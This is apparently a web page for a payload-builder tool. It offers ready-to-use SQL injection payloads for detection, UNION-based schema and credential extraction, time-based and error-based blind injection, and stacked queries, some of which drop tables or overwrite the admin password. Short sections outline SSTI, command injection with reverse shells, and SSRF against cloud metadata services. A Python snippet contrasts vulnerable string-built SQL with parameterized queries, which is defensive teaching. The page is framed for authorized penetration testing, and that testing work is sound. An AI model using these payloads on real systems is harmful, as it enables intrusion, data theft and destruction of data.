Web Payload Builder

Generate attack payloads for common web vulnerabilities. Select the vulnerability type, choose your target technology, and get ready-to-use payloads.

Warning

These payloads are for authorized penetration testing only. Using them against systems without explicit permission is illegal. Always obtain proper authorization before testing.

Detection

Basic SQLi detection tests

' OR '1'='1
' OR '1'='1'--
' OR '1'='1'#
' OR 1=1-- -
admin'--
1' AND '1'='1
1' AND '1'='2

UNION Based

Extract data via UNION SELECT

' UNION SELECT NULL--
' UNION SELECT NULL,NULL--
' UNION SELECT NULL,NULL,NULL--
' UNION SELECT 1,2,3--
' UNION SELECT @@version,NULL,NULL--
' UNION SELECT user(),database(),NULL--
' UNION SELECT table_name,NULL,NULL FROM information_schema.tables--
' UNION SELECT column_name,NULL,NULL FROM information_schema.columns WHERE table_name='users'--

Time-Based Blind

Detect via time delays

' AND SLEEP(5)--
' AND IF(1=1,SLEEP(5),0)--
' AND IF(SUBSTRING(database(),1,1)='a',SLEEP(5),0)--
' AND BENCHMARK(5000000,SHA1('test'))--
1' AND (SELECT SLEEP(5) FROM dual WHERE database() LIKE '%')--

Error Based

Extract data via error messages

' AND EXTRACTVALUE(1,CONCAT(0x7e,(SELECT @@version),0x7e))--
' AND UPDATEXML(1,CONCAT(0x7e,(SELECT user()),0x7e),1)--
' AND (SELECT 1 FROM (SELECT COUNT(*),CONCAT((SELECT database()),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)--

Stacked Queries

Multiple statements (if supported)

'; DROP TABLE users;--
'; INSERT INTO users VALUES('hacker','hacked');--
'; UPDATE users SET password='hacked' WHERE username='admin';--

How to Use This Tool

💉 SQL Injection

Select your target database type to get payloads in its dialect. Databases differ in comment syntax, string concatenation, and built-in functions, so a payload written for one engine often fails on another.

  • Detection: Start here to confirm SQLi exists
  • UNION Based: For data extraction when output is visible
  • Time-Based: For blind injection detection
  • Error Based: When errors reveal data
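To show why the detection payloads above work and what closes the hole, here is an added example (not part of this tool) that runs two of them against a constructed SQLite login table: once through a string-built query and once through a parameterized one. The table, rows and function names are assumptions for the demo; SQLite is used because it honours the same `'` and `--` handling the payloads rely on.

```python
import sqlite3

# Constructed sample table for the demo; not from any real application.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT, role TEXT)")
    conn.executemany(
        "INSERT INTO users VALUES (?, ?, ?)",
        [("admin", "s3cret", "admin"), ("alice", "wonderland", "user")],
    )
    return conn

def login_vulnerable(conn, username, password):
    # String-built SQL: a quote in the input closes the literal and the
    # remainder is parsed as SQL, so "--" comments out the password check.
    sql = (
        "SELECT username, role FROM users "
        f"WHERE username='{username}' AND password='{password}'"
    )
    return conn.execute(sql).fetchall()

def login_parameterized(conn, username, password):
    # Placeholders: values are bound separately from the statement text and
    # can never change its structure, whatever characters they contain.
    sql = "SELECT username, role FROM users WHERE username=? AND password=?"
    return conn.execute(sql, (username, password)).fetchall()

def compare(username, password):
    # Run the same input through both versions and return the rows each yields.
    conn = make_db()
    return {
        "vulnerable": login_vulnerable(conn, username, password),
        "parameterized": login_parameterized(conn, username, password),
    }

if __name__ == "__main__":
    # The two detection payloads from the list above, plus a legitimate login.
    for user, pw in [("admin'--", "x"), ("' OR '1'='1", "' OR '1'='1"), ("alice", "wonderland")]:
        print(repr(user), repr(pw), compare(user, pw))
```

The string-built version returns the admin row for `admin'--` and every row for `' OR '1'='1`, while the parameterized version returns nothing for either and still authenticates the genuine user.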

📝 SSTI (Server-Side Template Injection)

Template engines have different syntax. Identify the engine first using detection payloads, then use RCE payloads for code execution.

  • Jinja2: Python Flask/Django
  • Twig: PHP Symfony
  • FreeMarker: Java applications
  • ERB: Ruby on Rails

💻 Command Injection

OS commands vary between Linux/macOS (bash) and Windows (cmd/PowerShell). Use appropriate payloads for your target system.

  • Basic: Simple command chaining (; | || &&)
  • Blind: Detect via sleep or out-of-band
  • Filter Bypass: When basic chars are filtered
  • Reverse Shell: Get interactive access

🌐 SSRF (Server-Side Request Forgery)

Cloud metadata services are prime SSRF targets. Each cloud provider has different endpoints and may require specific headers.

  • AWS: IMDSv1 (no token required) vs IMDSv2 (requires a session token)
  • GCP: Requires Metadata-Flavor header
  • Azure: Requires Metadata: true header
  • Kubernetes: Service account tokens
